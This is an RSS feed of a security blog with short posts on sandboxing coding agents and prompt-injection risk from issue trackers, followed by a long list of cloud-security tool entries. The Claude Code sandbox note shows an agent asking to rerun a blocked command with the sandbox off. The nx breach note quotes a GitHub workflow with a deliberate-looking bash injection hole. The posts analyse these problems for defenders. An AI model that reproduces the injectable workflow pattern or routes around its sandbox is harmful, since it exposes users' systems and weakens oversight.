<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>Cloudberry Engineering</title>
    <link>https://cloudberry.engineering/</link>
    <description>Recent content on Cloudberry Engineering</description>
    <generator>Hugo</generator>
    <language>en-us</language>
    <lastBuildDate>Sat, 07 Mar 2026 00:40:02 +0100</lastBuildDate>
    <atom:link href="https://cloudberry.engineering/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Agentbox</title>
      <link>https://cloudberry.engineering/note/agentbox/</link>
      <pubDate>Sat, 07 Mar 2026 00:40:02 +0100</pubDate>
      <guid>https://cloudberry.engineering/note/agentbox/</guid>
      <description>&lt;p&gt;Since there are so many to choose from, I built my own sandbox for &lt;strong&gt;local&lt;/strong&gt; coding agents. I use it within my homebrew agent orchestrator running Ralph loops.&lt;/p&gt;&#xA;&lt;p&gt;The sandbox is &lt;a href=&#34;https://github.com/gbrindisi/agentbox&#34;&gt;this&lt;/a&gt;, and builds on the mental models I sketched &lt;a href=&#34;https://cloudberry.engineering/article/on-sandboxing-agents/&#34;&gt;here&lt;/a&gt;.&lt;/p&gt;&#xA;&lt;p&gt;What stands out compared to competitors:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Focus is &lt;strong&gt;user experience&lt;/strong&gt;: it&amp;rsquo;s an abstraction on top of a container, but it&amp;rsquo;s simpler to setup with a high level config file that I sarcastically baptized &lt;code&gt;Agentfile&lt;/code&gt;.&lt;/li&gt;&#xA;&lt;li&gt;The networking boundary talks back to the agent, to avoid hallucinatory loops where the agent tries really hard to reach a remote destination that is blocked.&lt;/li&gt;&#xA;&lt;/ul&gt;</description>
    </item>
    <item>
      <title>On Sandboxing Agents</title>
      <link>https://cloudberry.engineering/article/on-sandboxing-agents/</link>
      <pubDate>Sat, 07 Mar 2026 00:26:17 +0100</pubDate>
      <guid>https://cloudberry.engineering/article/on-sandboxing-agents/</guid>
      <description>&lt;p&gt;I am still on a quest to stay out of the loop with coding agents, to reach warp speed yoloness. So I am obsessing over sandboxes.&lt;/p&gt;&#xA;&lt;p&gt;Can I put an agent in a box, give it a task and go to sleep? There are tons of solutions right now but it&amp;rsquo;s hard to tell which is the right approach.&lt;/p&gt;&#xA;&lt;p&gt;The reason is that sandboxing agents isn&amp;rsquo;t one problem but at least two. A local sandbox on a developer machine and a remote multi-tenant sandbox serve different threat models, require different controls, and fail in different ways. Treating them as the same leads to the wrong tradeoffs.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Agent Sandboxes</title>
      <link>https://cloudberry.engineering/note/agent-sandboxes/</link>
      <pubDate>Wed, 04 Feb 2026 14:32:36 +0100</pubDate>
      <guid>https://cloudberry.engineering/note/agent-sandboxes/</guid>
      <description>&lt;p&gt;I am forcing myself to stay out of the loop, and I am looking at ways to sandbox coding agents running without supervision. I do have my own container based setup but I am curious to see what&amp;rsquo;s everyone else cooking. This is what I found so far:&lt;/p&gt;&#xA;&lt;p&gt;docker sandbox &lt;a href=&#34;https://docs.docker.com/ai/sandboxes/&#34;&gt;https://docs.docker.com/ai/sandboxes/&lt;/a&gt;&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;create a microvm with a private docker daemon inside&lt;/li&gt;&#xA;&lt;li&gt;agents run in containers inside the microvm&lt;/li&gt;&#xA;&lt;li&gt;the use case for this seems to be coding agents that need to orchestrate containers, removing the hassle to mount the host docker socket into a container&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://github.com/trailofbits/claude-code-devcontainer&#34;&gt;https://github.com/trailofbits/claude-code-devcontainer&lt;/a&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>GH Issues Considered Dangerous</title>
      <link>https://cloudberry.engineering/note/gh-issues-considered-dangerous/</link>
      <pubDate>Mon, 02 Feb 2026 21:29:04 +0100</pubDate>
      <guid>https://cloudberry.engineering/note/gh-issues-considered-dangerous/</guid>
      <description>&lt;p&gt;We are moving towards a place where ticketing systems will become an important component to protect, akin to CI/CD.&lt;/p&gt;&#xA;&lt;p&gt;Tickets are a new source of untrusted input we need to account for when threat modeling against prompt injections.&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://github.com/ghostty-org/ghostty/issues/3558&#34;&gt;Ghostty&lt;/a&gt; only allows maintainers to create issues, seems to me they figured out a cheap and pragmatic security policy by accident.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Claude Code Sandbox</title>
      <link>https://cloudberry.engineering/note/claude-code-sandbox/</link>
      <pubDate>Tue, 27 Jan 2026 23:13:42 +0100</pubDate>
      <guid>https://cloudberry.engineering/note/claude-code-sandbox/</guid>
      <description>&lt;p&gt;How does Claude Code sandbox work when used with &lt;code&gt;--dangerously-skip-permissions&lt;/code&gt;? It does&amp;rsquo;t, since Claude asks permission to evade the sandbox, and yolo mode automatically allows it.&lt;/p&gt;&#xA;&lt;p&gt;Normal:&lt;/p&gt;&#xA;&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;Your bash commands will be sandboxed. Disable with /sandbox.&#xA;&#xA;❯ list the files in ~/Downloads and then write an empty file in that directory named SANDBOXTEST&#xA;&#xA;⏺ Read 1 file (ctrl+o to expand)&#xA;&#xA;⏺ Write(~/Downloads/SANDBOXTEST)&#xA;  ⎿  Wrote 1 lines to ../../../Downloads/SANDBOXTEST&#xA;      1 (No content)&#xA;&#xA;⏺ Done. Listed the files in ~/Downloads (there are many files including PDFs, STL files, images, and various other documents) and created an empty file&#xA;  named SANDBOXTEST in that directory.&#xA;&#xA;❯ use `touch` to touch the SANDBOXTEST file&#xA;&#xA;⏺ Bash(touch ~/Downloads/SANDBOXTEST)&#xA;  ⎿  Error: Exit code 1&#xA;     touch: /Users/g/Downloads/SANDBOXTEST: Operation not permitted&#xA;&#xA;⏺ The sandbox blocked that operation since ~/Downloads is outside the allowed write paths. Let me retry with the sandbox disabled.&#xA;&#xA;&amp;lt;asks to touch SANDBOXTEST without sandbox&amp;gt;&#xA;&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;With &lt;code&gt;--dangerously-skip-permissions&lt;/code&gt;:&lt;/p&gt;</description>
    </item>
    <item>
      <title>How I Think About Agentic Risks</title>
      <link>https://cloudberry.engineering/article/agentic-risks/</link>
      <pubDate>Sun, 21 Dec 2025 18:11:01 +0100</pubDate>
      <guid>https://cloudberry.engineering/article/agentic-risks/</guid>
      <description>&lt;p&gt;Fully aware that this might be obsolete in half a year, this is my current mental model to reason about AI Agents risks.&lt;/p&gt;&#xA;&lt;p&gt;This is based largely on my experience in assessing AI systems in the last two years, and applying prior art into my day to day work.&lt;/p&gt;&#xA;&lt;p&gt;Of everything I digested in current literature the two most influential pieces have been the &lt;a href=&#34;https://storage.googleapis.com/gweb-research2023-media/pubtools/1018686.pdf&#34;&gt;Google AI Agent security framework&lt;/a&gt; and the &lt;a href=&#34;https://simonwillison.net/tags/lethal-trifecta/&#34;&gt;Lethal Trifecta&lt;/a&gt; and the public discourse around it.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Coding Agents Security Theater</title>
      <link>https://cloudberry.engineering/note/coding-agents-security-theater/</link>
      <pubDate>Thu, 04 Dec 2025 23:29:10 +0100</pubDate>
      <guid>https://cloudberry.engineering/note/coding-agents-security-theater/</guid>
      <description>&lt;p&gt;Security is hard so let&amp;rsquo;s skip it. Although the author is not wrong:&lt;/p&gt;&#xA;&lt;blockquote&gt;&#xA;&lt;p&gt;If you look at the security measures in other coding agents, they&amp;rsquo;re mostly security theater. As soon as your agent can write code and run code, it&amp;rsquo;s pretty much game over. The only way you could prevent exfiltration of data would be to cut off all network access for the execution environment the agent runs in, which makes the agent mostly useless. An alternative is allow-listing domains, but this can also be worked around through other means.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Finding vulnerabilities with LLMs</title>
      <link>https://cloudberry.engineering/note/finding-vulns-with-coding-agents/</link>
      <pubDate>Wed, 03 Sep 2025 08:51:16 +0200</pubDate>
      <guid>https://cloudberry.engineering/note/finding-vulns-with-coding-agents/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;https://semgrep.dev/blog/2025/finding-vulnerabilities-in-modern-web-apps-using-claude-code-and-openai-codex/&#34;&gt;Finding vulnerabilities in modern web apps using Claude Code and OpenAI Codex&lt;/a&gt;. Super interesting to see some benchmarks.&lt;/p&gt;&#xA;&lt;p&gt;Traditional rule based detection can&amp;rsquo;t find complex vulnerabilities and even potentially detectable issues might go unnoticed as false negatives. This helps answer the question whether LLM could be integrated to cover this blind spot.&lt;/p&gt;&#xA;&lt;p&gt;They could! But the problem is the noise:&lt;/p&gt;&#xA;&lt;blockquote&gt;&#xA;&lt;p&gt;AI Coding Agents Find Real Vulnerabilities: Claude Code found 46 vulnerabilities (14% true positive rate – TPR, 86% false positive rate – FPR) and Codex reported 21 vulnerabilities (18% TPR, 82% FPR). About 20 of these are high severity vulnerabilities.&lt;/p&gt;</description>
    </item>
    <item>
      <title>The nx Breach</title>
      <link>https://cloudberry.engineering/note/nx-breach/</link>
      <pubDate>Mon, 01 Sep 2025 18:49:04 +0200</pubDate>
      <guid>https://cloudberry.engineering/note/nx-breach/</guid>
      <description>&lt;p&gt;How did they breach nx to &lt;a href=&#34;https://github.com/nrwl/nx/security/advisories/GHSA-cxm3-wv7p-598c&#34;&gt;publish a malicious package&lt;/a&gt;?&lt;/p&gt;&#xA;&lt;p&gt;It started with the nx team &lt;a href=&#34;https://github.com/nrwl/nx/pull/32458/files&#34;&gt;introducing&lt;/a&gt; a bash injection vulnerability in a new github workflow:&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; style=&#34;color:#272822;background-color:#fafafa;-moz-tab-size:4;-o-tab-size:4;tab-size:4;&#34;&gt;&lt;code class=&#34;language-yaml&#34; data-lang=&#34;yaml&#34;&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;      - &lt;span style=&#34;color:#f92672&#34;&gt;name&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;:&lt;/span&gt; &lt;span style=&#34;color:#ae81ff&#34;&gt;Create PR message file&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;        &lt;span style=&#34;color:#f92672&#34;&gt;run&lt;/span&gt;&lt;span style=&#34;color:#111&#34;&gt;:&lt;/span&gt; &lt;span style=&#34;color:#111&#34;&gt;|&lt;/span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;          mkdir -p /tmp&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;          cat &amp;gt; /tmp/pr-message.txt &amp;lt;&amp;lt; &amp;#39;EOF&amp;#39;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;          ${{ github.event.pull_request.title }}&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;          &#xA;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;          ${{ github.event.pull_request.body }}&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&#34;display:flex;&#34;&gt;&lt;span&gt;&lt;span style=&#34;color:#d88200&#34;&gt;          EOF&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Both &lt;code&gt;${{ github.event.pull_request.title }}&lt;/code&gt; and &lt;code&gt;${{ github.event.pull_request.body }}&lt;/code&gt; are untrusted content that is directly used inside the &lt;code&gt;run&lt;/code&gt; context of the workflow.&lt;/p&gt;</description>
    </item>
    <item>
      <title>How to Sell to Security Teams</title>
      <link>https://cloudberry.engineering/article/how-to-sell-to-security-teams/</link>
      <pubDate>Wed, 15 May 2024 19:04:24 +0200</pubDate>
      <guid>https://cloudberry.engineering/article/how-to-sell-to-security-teams/</guid>
      <description>&lt;div class=&#34;note&#34;&gt;&#xA;&lt;p&gt;&lt;strong&gt;Context&lt;/strong&gt;&lt;/p&gt;&#xA;&lt;p&gt;I wrote this some time ago as an internal memo for marketing and product to help craft value propositions to sell security tools to security teams.&lt;/p&gt;&#xA;&#xA;&lt;/div&gt;&#xA;&#xA;&lt;p&gt;I&amp;rsquo;ve noticed some confusion around the objectives of security teams and I&amp;rsquo;d like to share my perspective, hoping to clarify matters. Please note that these are just my opinions based on my experiences as a &lt;em&gt;security persona&lt;/em&gt; across various organizations.&lt;/p&gt;&#xA;&lt;p&gt;&lt;strong&gt;What is the goal of a security program?&lt;/strong&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>Foundations of a Multi-Cloud Security Strategy</title>
      <link>https://cloudberry.engineering/article/multi-cloud-security-strategy-foundations/</link>
      <pubDate>Sat, 28 Nov 2020 21:23:05 +0100</pubDate>
      <guid>https://cloudberry.engineering/article/multi-cloud-security-strategy-foundations/</guid>
      <description>&lt;p&gt;I’ve spent a good year working on a security strategy to manage multi-cloud environments, in this article I want to share what I wish we did in advance to be better prepared.&lt;/p&gt;</description>
    </item>
    <item>
      <title>The Quirks of Apps Script and Google Cloud</title>
      <link>https://cloudberry.engineering/article/quirks-apps-script-google-cloud/</link>
      <pubDate>Sun, 15 Nov 2020 20:30:25 +0100</pubDate>
      <guid>https://cloudberry.engineering/article/quirks-apps-script-google-cloud/</guid>
      <description>&lt;p&gt;Using &lt;a href=&#34;https://developers.google.com/apps-script&#34;&gt;Apps Script&lt;/a&gt; for scripting  GSuite / Google Workplace will generate Google Cloud Platform (GCP) projects in the background.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Google Cloud Service Accounts Security Best Practices</title>
      <link>https://cloudberry.engineering/article/google-cloud-service-accounts-security-best-practices/</link>
      <pubDate>Sun, 08 Nov 2020 13:29:51 +0100</pubDate>
      <guid>https://cloudberry.engineering/article/google-cloud-service-accounts-security-best-practices/</guid>
      <description>&lt;p&gt;Service Accounts in Google Cloud Platform (GCP) are the main vector to hack an account: it’s easy to use them wrong and end up with a compromised key and a lot of headaches.&lt;/p&gt;</description>
    </item>
    <item>
      <title>A Practical Introduction to Container Security</title>
      <link>https://cloudberry.engineering/article/practical-introduction-container-security/</link>
      <pubDate>Sun, 01 Nov 2020 11:24:54 +0100</pubDate>
      <guid>https://cloudberry.engineering/article/practical-introduction-container-security/</guid>
      <description>&lt;p&gt;Securing containers is a complex task.  The problem space is broad, vendors are on fire, there are tons of checklists and best practices and it’s hard to prioritize solutions. So if you had to &lt;strong&gt;implement a container security strategy&lt;/strong&gt; where would you start?&lt;/p&gt;</description>
    </item>
    <item>
      <title>Google Cloud IAM for Security Teams</title>
      <link>https://cloudberry.engineering/article/google-cloud-iam-security-guide/</link>
      <pubDate>Sun, 25 Oct 2020 13:40:43 +0100</pubDate>
      <guid>https://cloudberry.engineering/article/google-cloud-iam-security-guide/</guid>
      <description>&lt;p&gt;Identity and Access Management (IAM) is an important piece of the cloud puzzle and it’s usually a source of headaches from a security point of view. Let’s try to give some pointers from a blue team perspective.&lt;/p&gt;&#xA;&lt;p&gt;If you are a security team that just inherited a bunch of Google Cloud Platform (GCP) accounts, this guide is for you.&lt;/p&gt;</description>
    </item>
    <item>
      <title>A Collection of Cloud Security Tools</title>
      <link>https://cloudberry.engineering/article/cloud-security-tools/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/article/cloud-security-tools/</guid>
      <description>&lt;p&gt;I&amp;rsquo;ve built a &lt;a href=&#34;https://cloudberry.engineering/tool/&#34;&gt;directory of open source &lt;strong&gt;cloud security tools&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;</description>
    </item>
    <item>
      <title>aardvark</title>
      <link>https://cloudberry.engineering/tool/aardvark/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/aardvark/</guid>
      <description></description>
    </item>
    <item>
      <title>actionhero</title>
      <link>https://cloudberry.engineering/tool/actionhero/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/actionhero/</guid>
      <description></description>
    </item>
    <item>
      <title>Adaz</title>
      <link>https://cloudberry.engineering/tool/adaz/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/adaz/</guid>
      <description></description>
    </item>
    <item>
      <title>AirIAM</title>
      <link>https://cloudberry.engineering/tool/airiam/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/airiam/</guid>
      <description></description>
    </item>
    <item>
      <title>aks-checklist</title>
      <link>https://cloudberry.engineering/tool/aks-checklist/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/aks-checklist/</guid>
      <description></description>
    </item>
    <item>
      <title>amazon-s3-find-and-forget</title>
      <link>https://cloudberry.engineering/tool/amazon-s3-find-and-forget/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/amazon-s3-find-and-forget/</guid>
      <description></description>
    </item>
    <item>
      <title>attack_range</title>
      <link>https://cloudberry.engineering/tool/attack_range/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/attack_range/</guid>
      <description></description>
    </item>
    <item>
      <title>automated-cloud-advisor</title>
      <link>https://cloudberry.engineering/tool/automated-cloud-advisor/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/automated-cloud-advisor/</guid>
      <description></description>
    </item>
    <item>
      <title>autovpn</title>
      <link>https://cloudberry.engineering/tool/autovpn/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/autovpn/</guid>
      <description></description>
    </item>
    <item>
      <title>aws_exposable_resources</title>
      <link>https://cloudberry.engineering/tool/aws_exposable_resources/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/aws_exposable_resources/</guid>
      <description></description>
    </item>
    <item>
      <title>aws_key_triage_tool</title>
      <link>https://cloudberry.engineering/tool/aws_key_triage_tool/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/aws_key_triage_tool/</guid>
      <description></description>
    </item>
    <item>
      <title>aws-auto-remediate</title>
      <link>https://cloudberry.engineering/tool/aws-auto-remediate/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/aws-auto-remediate/</guid>
      <description></description>
    </item>
    <item>
      <title>aws-billing-slack-lambda</title>
      <link>https://cloudberry.engineering/tool/aws-billing-slack-lambda/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/aws-billing-slack-lambda/</guid>
      <description></description>
    </item>
    <item>
      <title>aws-iam-authenticator</title>
      <link>https://cloudberry.engineering/tool/aws-iam-authenticator/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/aws-iam-authenticator/</guid>
      <description></description>
    </item>
    <item>
      <title>aws-iamctl</title>
      <link>https://cloudberry.engineering/tool/aws-iamctl/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/aws-iamctl/</guid>
      <description></description>
    </item>
    <item>
      <title>aws-incident-response</title>
      <link>https://cloudberry.engineering/tool/aws-incident-response/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/aws-incident-response/</guid>
      <description></description>
    </item>
    <item>
      <title>aws-incident-response-runbooks</title>
      <link>https://cloudberry.engineering/tool/aws-incident-response-runbooks/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/aws-incident-response-runbooks/</guid>
      <description></description>
    </item>
    <item>
      <title>aws-lambda-api-call-recorder</title>
      <link>https://cloudberry.engineering/tool/aws-lambda-api-call-recorder/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/aws-lambda-api-call-recorder/</guid>
      <description></description>
    </item>
    <item>
      <title>aws-recon</title>
      <link>https://cloudberry.engineering/tool/aws-recon/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/aws-recon/</guid>
      <description></description>
    </item>
    <item>
      <title>aws-s3-virusscan</title>
      <link>https://cloudberry.engineering/tool/aws-s3-virusscan/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/aws-s3-virusscan/</guid>
      <description></description>
    </item>
    <item>
      <title>aws-sso-credential-process</title>
      <link>https://cloudberry.engineering/tool/aws-sso-credential-process/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/aws-sso-credential-process/</guid>
      <description></description>
    </item>
    <item>
      <title>capsule</title>
      <link>https://cloudberry.engineering/tool/capsule/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/capsule/</guid>
      <description></description>
    </item>
    <item>
      <title>cdkgoat</title>
      <link>https://cloudberry.engineering/tool/cdkgoat/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/cdkgoat/</guid>
      <description></description>
    </item>
    <item>
      <title>cfngoat</title>
      <link>https://cloudberry.engineering/tool/cfngoat/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/cfngoat/</guid>
      <description></description>
    </item>
    <item>
      <title>chart-testing</title>
      <link>https://cloudberry.engineering/tool/chart-testing/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/chart-testing/</guid>
      <description></description>
    </item>
    <item>
      <title>cloudformation-guard</title>
      <link>https://cloudberry.engineering/tool/cloudformation-guard/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/cloudformation-guard/</guid>
      <description></description>
    </item>
    <item>
      <title>cloudkeeper</title>
      <link>https://cloudberry.engineering/tool/cloudkeeper/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/cloudkeeper/</guid>
      <description></description>
    </item>
    <item>
      <title>CloudShell</title>
      <link>https://cloudberry.engineering/tool/cloudshell/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/cloudshell/</guid>
      <description></description>
    </item>
    <item>
      <title>cloudsplaining</title>
      <link>https://cloudberry.engineering/tool/cloudsplaining/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/cloudsplaining/</guid>
      <description></description>
    </item>
    <item>
      <title>cloudtracker</title>
      <link>https://cloudberry.engineering/tool/cloudtracker/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/cloudtracker/</guid>
      <description></description>
    </item>
    <item>
      <title>container-diff</title>
      <link>https://cloudberry.engineering/tool/container-diff/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/container-diff/</guid>
      <description></description>
    </item>
    <item>
      <title>container-scan</title>
      <link>https://cloudberry.engineering/tool/container-scan/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/container-scan/</guid>
      <description></description>
    </item>
    <item>
      <title>CONVEX</title>
      <link>https://cloudberry.engineering/tool/convex/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/convex/</guid>
      <description></description>
    </item>
    <item>
      <title>copilot-cli</title>
      <link>https://cloudberry.engineering/tool/copilot-cli/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/copilot-cli/</guid>
      <description></description>
    </item>
    <item>
      <title>dagda</title>
      <link>https://cloudberry.engineering/tool/dagda/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/dagda/</guid>
      <description></description>
    </item>
    <item>
      <title>dast-operator</title>
      <link>https://cloudberry.engineering/tool/dast-operator/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/dast-operator/</guid>
      <description></description>
    </item>
    <item>
      <title>DefendTheFlag</title>
      <link>https://cloudberry.engineering/tool/defendtheflag/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/defendtheflag/</guid>
      <description></description>
    </item>
    <item>
      <title>detection-rules</title>
      <link>https://cloudberry.engineering/tool/detection-rules/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/detection-rules/</guid>
      <description></description>
    </item>
    <item>
      <title>docker-slim</title>
      <link>https://cloudberry.engineering/tool/docker-slim/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/docker-slim/</guid>
      <description></description>
    </item>
    <item>
      <title>dockerfile-security</title>
      <link>https://cloudberry.engineering/tool/dockerfile-security/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/dockerfile-security/</guid>
      <description>&lt;h2 id=&#34;references&#34;&gt;References:&lt;/h2&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;&lt;a href=&#34;https://cloudberry.engineering/article/dockerfile-security-best-practices/&#34;&gt;The theory behind each security misconfiguration in Dockerfiles&lt;/a&gt;&lt;/li&gt;&#xA;&lt;/ul&gt;</description>
    </item>
    <item>
      <title>dockle</title>
      <link>https://cloudberry.engineering/tool/dockle/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/dockle/</guid>
      <description></description>
    </item>
    <item>
      <title>dostainer</title>
      <link>https://cloudberry.engineering/tool/dostainer/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/dostainer/</guid>
      <description></description>
    </item>
    <item>
      <title>Dragonfly</title>
      <link>https://cloudberry.engineering/tool/dragonfly/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/dragonfly/</guid>
      <description></description>
    </item>
    <item>
      <title>gatekeeper</title>
      <link>https://cloudberry.engineering/tool/gatekeeper/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/gatekeeper/</guid>
      <description></description>
    </item>
    <item>
      <title>gcp-iam-role-permissions</title>
      <link>https://cloudberry.engineering/tool/gcp-iam-role-permissions/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/gcp-iam-role-permissions/</guid>
      <description></description>
    </item>
    <item>
      <title>gimme-aws-creds</title>
      <link>https://cloudberry.engineering/tool/gimme-aws-creds/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/gimme-aws-creds/</guid>
      <description></description>
    </item>
    <item>
      <title>gke-auditor</title>
      <link>https://cloudberry.engineering/tool/gke-auditor/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/gke-auditor/</guid>
      <description></description>
    </item>
    <item>
      <title>goldpinger</title>
      <link>https://cloudberry.engineering/tool/goldpinger/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/goldpinger/</guid>
      <description></description>
    </item>
    <item>
      <title>govuk-aws</title>
      <link>https://cloudberry.engineering/tool/govuk-aws/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/govuk-aws/</guid>
      <description></description>
    </item>
    <item>
      <title>grype</title>
      <link>https://cloudberry.engineering/tool/grype/</link>
      <pubDate>Sun, 18 Oct 2020 00:00:00 +0000</pubDate>
      <guid>https://cloudberry.engineering/tool/grype/</guid>
